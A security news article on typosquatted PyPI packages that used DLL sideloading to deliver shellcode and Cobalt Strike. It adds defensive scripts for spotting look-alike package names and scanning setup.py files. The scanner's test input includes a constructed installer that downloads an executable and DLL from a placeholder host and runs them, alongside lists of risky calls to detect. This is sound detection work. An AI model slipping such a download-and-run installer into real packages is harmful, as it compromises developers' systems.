ReversingLabs researchers have uncovered Python packages using DLL sideloading to bypass security tools.
On 10 January 2024, Karlo Zanki, a reverse engineer at ReversingLabs, came across two suspicious packages on the Python Package Index (PyPI). The packages, named NP6HelperHttptest and NP6HelperHttper, used DLL sideloading, a well-known technique in which a malicious DLL is loaded by a legitimate, often signed, executable so that the malicious code runs inside a trusted process and is less likely to be flagged by security tools.
The discovery underscores the expanding threat landscape in software supply chains, where attackers abuse the openness of public package registries rather than any flaw in the registry itself: anyone can publish, and the developer pulling in a module has to judge its authenticity among an enormous and constantly changing body of available code.
The malicious packages, disguised under names closely resembling legitimate ones, aimed to deceive developers into unwittingly incorporating them into their projects. This tactic, known as typosquatting, is just one of many methods employed by attackers to infiltrate legitimate software supply chains.
Further investigation showed that the malicious packages targeted two existing PyPI packages, NP6HelperHttp and NP6HelperConfig, originally published by a user named NP6. NP6 is associated with Chapvision, a marketing automation firm, but the PyPI account in question was a personal account belonging to a Chapvision developer. Chapvision confirmed that the helper tools were legitimate, and the malicious packages were subsequently removed from PyPI.
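The look-alike names above are exactly what a name check against an allowlist would catch: both malicious packages are the legitimate NP6HelperHttp with characters appended. As an added example (not code from ReversingLabs, Chapvision or PyPI), the following Python script reads requirements.txt-style lines, normalises names the way PyPI does, and flags any name that is not on the allowlist but is within two edits of a known name or is a known name with something prepended or appended. The allowlist, the requirement lines and the edit-distance threshold are constructed assumptions for illustration.

```python
"""Typosquat check for dependency names against a known-good allowlist.

Added example; not tooling from ReversingLabs, Chapvision or PyPI.
KNOWN_GOOD and SAMPLE_REQUIREMENTS are constructed for illustration.
"""
import re
from typing import List, Optional, Tuple


def normalize(name: str) -> str:
    """PEP 503 name normalisation: case-fold and collapse runs of '-', '_' and '.'."""
    return re.sub(r"[-_.]+", "-", name).lower()


def levenshtein(a: str, b: str) -> int:
    """Edit distance (insert, delete, substitute) between two strings."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,                 # delete ca
                           cur[j - 1] + 1,              # insert cb
                           prev[j - 1] + (ca != cb)))   # substitute
        prev = cur
    return prev[-1]


def requirement_name(line: str) -> Optional[str]:
    """Distribution name from a requirements.txt line; None for blanks, comments and pip options."""
    line = line.split("#", 1)[0].strip()
    if not line or line.startswith("-"):
        return None
    m = re.match(r"[A-Za-z0-9][A-Za-z0-9._-]*", line)
    return m.group(0) if m else None


def find_suspects(requirements: List[str], allowlist: List[str],
                  max_distance: int = 2) -> List[Tuple[str, str, int]]:
    """Return (requested, closest_known, distance) for each requested name that is not
    on the allowlist but is within max_distance edits of a known name, or is a known
    name with extra characters prepended or appended (NP6HelperHttp -> NP6HelperHttptest).
    Exact matches and clearly unrelated names are ignored."""
    known = {normalize(n): n for n in allowlist}
    suspects = []
    for line in requirements:
        raw = requirement_name(line)
        if raw is None:
            continue
        norm = normalize(raw)
        if norm in known:
            continue
        best = min(known, key=lambda k: levenshtein(norm, k))
        dist = levenshtein(norm, best)
        if dist <= max_distance or norm.startswith(best) or norm.endswith(best):
            suspects.append((raw, known[best], dist))
    return suspects


# Constructed sample input: the legitimate NP6 helpers plus one common library,
# and a requirements file that mixes exact names with look-alikes.
KNOWN_GOOD = ["NP6HelperHttp", "NP6HelperConfig", "requests"]
SAMPLE_REQUIREMENTS = [
    "NP6HelperHttp==1.0.0",
    "NP6HelperHttptest",        # known name with a suffix appended
    "NP6HelperHttper>=0.1",     # two characters appended
    "requests>=2.31",
    "reqeusts",                 # transposed letters
    "# comment line",
    "-r base.txt",
]

if __name__ == "__main__":
    for requested, closest, dist in find_suspects(SAMPLE_REQUIREMENTS, KNOWN_GOOD):
        print(f"{requested!r} is not on the allowlist but resembles {closest!r} (edit distance {dist})")
```

The prefix and suffix rule deliberately errs on the side of noise: a legitimate package such as a "-toolbelt" companion of an allowlisted name will be reported until it is added to the allowlist, which is the point of an allowlist. Treat the output as a review queue, not a verdict, and run it in CI before the resolver ever contacts the index.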
Analysis of the malicious packages showed a setup.py script that, at install time, downloaded both a legitimate executable and a malicious DLL, dgdeskband64.dll, and placed them together. That is the essence of DLL sideloading: the legitimate executable looks for a DLL by name in its own directory, so a malicious DLL with the expected name placed alongside it is loaded and run inside that trusted, often signed, process. Because the binary that appears to be executing is known-good, the activity is less likely to be flagged by security tools, which is why the technique is so commonly used.
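Install-time behaviour of this kind is visible before anything runs, because a source distribution has to ship its setup.py in the clear. As an added example (not ReversingLabs' tooling and not a check PyPI performs), the following Python script walks the AST of a setup.py and reports what a metadata-only installer has no reason to contain: imports of network or process modules, download and execution calls, string references to .dll or .exe files, and a subclassed install command registered through cmdclass. The two setup.py sources embedded at the end are constructed for illustration; the host and file names in the suspicious one are placeholders, not indicators from the real campaign.

```python
"""Static scan of a setup.py for install-time download-and-drop behaviour.

Added example; not ReversingLabs' tooling and not a PyPI check. The two
setup.py sources at the bottom are constructed for illustration; the host
and file names in the suspicious one are placeholders, not real indicators.
"""
import ast
from typing import List, Tuple

# Modules an installer has no business importing just to declare metadata.
RISKY_MODULES = {"urllib", "urllib3", "requests", "http", "socket", "subprocess", "ctypes"}
# Dotted call names, matched exactly, as a trailing component, or as a prefix.
NETWORK_CALLS = ("urlopen", "urlretrieve", "requests.get", "requests.post",
                 "socket.socket", "http.client")
EXEC_CALLS = ("os.system", "os.popen", "os.startfile", "os.execv", "os.execl", "subprocess",
              "ctypes.CDLL", "ctypes.WinDLL", "ctypes.cdll", "ctypes.windll")
OBFUSCATION_CALLS = ("exec", "eval", "compile", "base64.b64decode", "zlib.decompress",
                     "marshal.loads")
# setuptools commands that run arbitrary code at install time when subclassed.
COMMAND_CLASSES = {"install", "develop", "build_py", "egg_info", "bdist_egg"}
NATIVE_EXTENSIONS = (".dll", ".exe", ".sys", ".so", ".dylib", ".scr")


def _dotted(func: ast.expr) -> str:
    """'urllib.request.urlretrieve' for an attribute chain rooted in a name, else ''."""
    parts = []
    while isinstance(func, ast.Attribute):
        parts.append(func.attr)
        func = func.value
    if isinstance(func, ast.Name):
        parts.append(func.id)
        return ".".join(reversed(parts))
    return ""


def _matches(dotted: str, patterns: Tuple[str, ...]) -> bool:
    return any(dotted == p or dotted.endswith("." + p) or dotted.startswith(p + ".")
               for p in patterns)


def scan_setup_py(source: str) -> List[str]:
    """Return 'line N: ...' findings sorted by line; empty for a metadata-only setup.py."""
    findings: List[Tuple[int, str]] = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            mods = [alias.name for alias in node.names]
        elif isinstance(node, ast.ImportFrom):
            mods = [node.module or ""]
        else:
            mods = []
        for mod in mods:
            if mod.split(".")[0] in RISKY_MODULES:
                findings.append((node.lineno, f"imports {mod}"))

        if isinstance(node, ast.Call):
            name = _dotted(node.func)
            if _matches(name, NETWORK_CALLS):
                findings.append((node.lineno, f"network call {name}()"))
            elif _matches(name, EXEC_CALLS):
                findings.append((node.lineno, f"process or library execution {name}()"))
            elif _matches(name, OBFUSCATION_CALLS):
                findings.append((node.lineno, f"dynamic code or decoding {name}()"))
            elif name == "setup" and any(kw.arg == "cmdclass" for kw in node.keywords):
                findings.append((node.lineno, "setup() registers a custom cmdclass"))
        elif isinstance(node, ast.ClassDef):
            for base in node.bases:
                base_name = base.id if isinstance(base, ast.Name) else getattr(base, "attr", "")
                if base_name in COMMAND_CLASSES:
                    findings.append((node.lineno,
                                     f"class {node.name} overrides setuptools command {base_name}"))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            if node.value.lower().endswith(NATIVE_EXTENSIONS):
                findings.append((node.lineno, f"references native binary {node.value!r}"))
    return [f"line {line}: {msg}" for line, msg in sorted(findings)]


# Constructed sample: a download-and-drop installer of the shape described in the article.
SUSPICIOUS_SETUP = '''\
from setuptools import setup
from setuptools.command.install import install
import os, urllib.request

class PostInstall(install):
    def run(self):
        install.run(self)
        base = "http://example.invalid/files/"   # placeholder host, not a real indicator
        target = os.path.join(os.environ.get("TEMP", "."), "helper")
        os.makedirs(target, exist_ok=True)
        for name in ("Launcher.exe", "helper64.dll"):   # placeholder file names
            urllib.request.urlretrieve(base + name, os.path.join(target, name))
        os.startfile(os.path.join(target, "Launcher.exe"))

setup(name="example-helper", version="0.0.1", cmdclass={"install": PostInstall})
'''

# Constructed sample: what a helper library's setup.py normally looks like.
BENIGN_SETUP = '''\
from setuptools import setup, find_packages

setup(
    name="example-helper",
    version="1.0.0",
    packages=find_packages(),
    install_requires=["requests>=2.31"],
)
'''

if __name__ == "__main__":
    for label, src in (("suspicious", SUSPICIOUS_SETUP), ("benign", BENIGN_SETUP)):
        print(f"{label}: {scan_setup_py(src) or ['no findings']}")
```

To obtain the script without installing anything, fetch the source distribution with `pip download --no-binary :all: --no-deps NAME` and point the scanner at the extracted setup.py. Wheels do not execute setup.py, so a package that only ships wheels needs its build hooks and its post-import code reviewed instead. Heavily obfuscated installers (a decoded blob handed to exec) will only trip the obfuscation patterns, so treat any finding as a reason to read the file, not as a verdict.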
Further examination revealed a wider campaign: a YARA retro hunt on ReversingLabs' Titanium Platform turned up additional samples with the same characteristics, indicating a coordinated effort by the threat actors rather than a one-off upload.
The malicious code embedded in the DLL executed its shellcode from within an exception handler rather than from an ordinary code path, a trick that hides the real execution flow from static analysis. The shellcode then connected to an external server to download and execute further payloads. The investigation also found traces of Cobalt Strike Beacon, a commercial red team tool that is routinely repurposed by threat actors for post-exploitation.
The discovery underscores the growing sophistication of attackers who use open-source infrastructure for their campaigns, and the need for developers and organisations to harden their software supply chains: checking that a dependency's name and publisher are the ones intended, reviewing what a package does at install time, and treating a package that downloads and runs native binaries during installation as hostile until proven otherwise.